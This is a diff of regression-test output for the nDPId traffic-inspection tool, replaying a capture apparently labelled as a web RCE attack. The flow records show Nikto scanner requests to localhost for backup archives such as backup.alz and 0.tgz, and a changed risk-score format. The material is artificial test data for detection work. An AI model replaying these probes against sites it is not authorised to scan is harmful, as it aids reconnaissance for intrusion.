{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1576420277204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277204,"pkt":"AAAAAAAAAAAAAAAACABFAADBsIBAAEAGi7R\/AAABfwAAAcQgH5BX0ojsod\/7v4AYAED+tQAAAQEICp1m\/PydZvz8R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1576420277206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420277206,"pkt":"AAAAAAAAAAAAAAAACABFAADEp6FAAEAGlJB\/AAABfwAAAcQiH5DXnp8L7+WKyYAYAED+uAAAAQEICp1m\/P6dZvz+R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1576420277207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420277207,"pkt":"AAAAAAAAAAAAAAAACABFAADELblAAEAGDnl\/AAABfwAAAcQkH5A1yBUjW63h5IAYAED+uAAAAQEICp1m\/P+dZvz\/R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1576420277209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277209,"pkt":"AAAAAAAAAAAAAAAACABFAADDSgRAAEAG8i5\/AAABfwAAAcQmH5DZEXKVufuNq4AYAED+twAAAQEICp1m\/QCdZv0AR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1576420277210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277210,"pkt":"AAAAAAAAAAAAAAAACABFAADDtt9AAEAGhVN\/AAABfwAAAcQoH5DVr45M6gY7v4AYAED+twAAAQEICp1m\/QKdZv0CR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1576420277211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277211,"pkt":"AAAAAAAAAAAAAAAACABFAAC9XspAAEAG3W5\/AAABfwAAAcQqH5Bdf2ZfE+bMgYAYAED+sQAAAQEICp1m\/QOdZv0DR0VUIC8wLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1576420277213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277213,"pkt":"AAAAAAAAAAAAAAAACABFAAC9v\/9AAEAGfDl\/AAABfwAAAcQsH5CYPYdrmayyCIAYAED+sQAAAQEICp1m\/QWdZv0FR0VUIC8wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1576420277215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277215,"pkt":"AAAAAAAAAAAAAAAACABFAADCrDVAAEAGj\/5\/AAABfwAAAcQuH5DnZJSlMCY5doAYAED+tgAAAQEICp1m\/QedZv0GR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
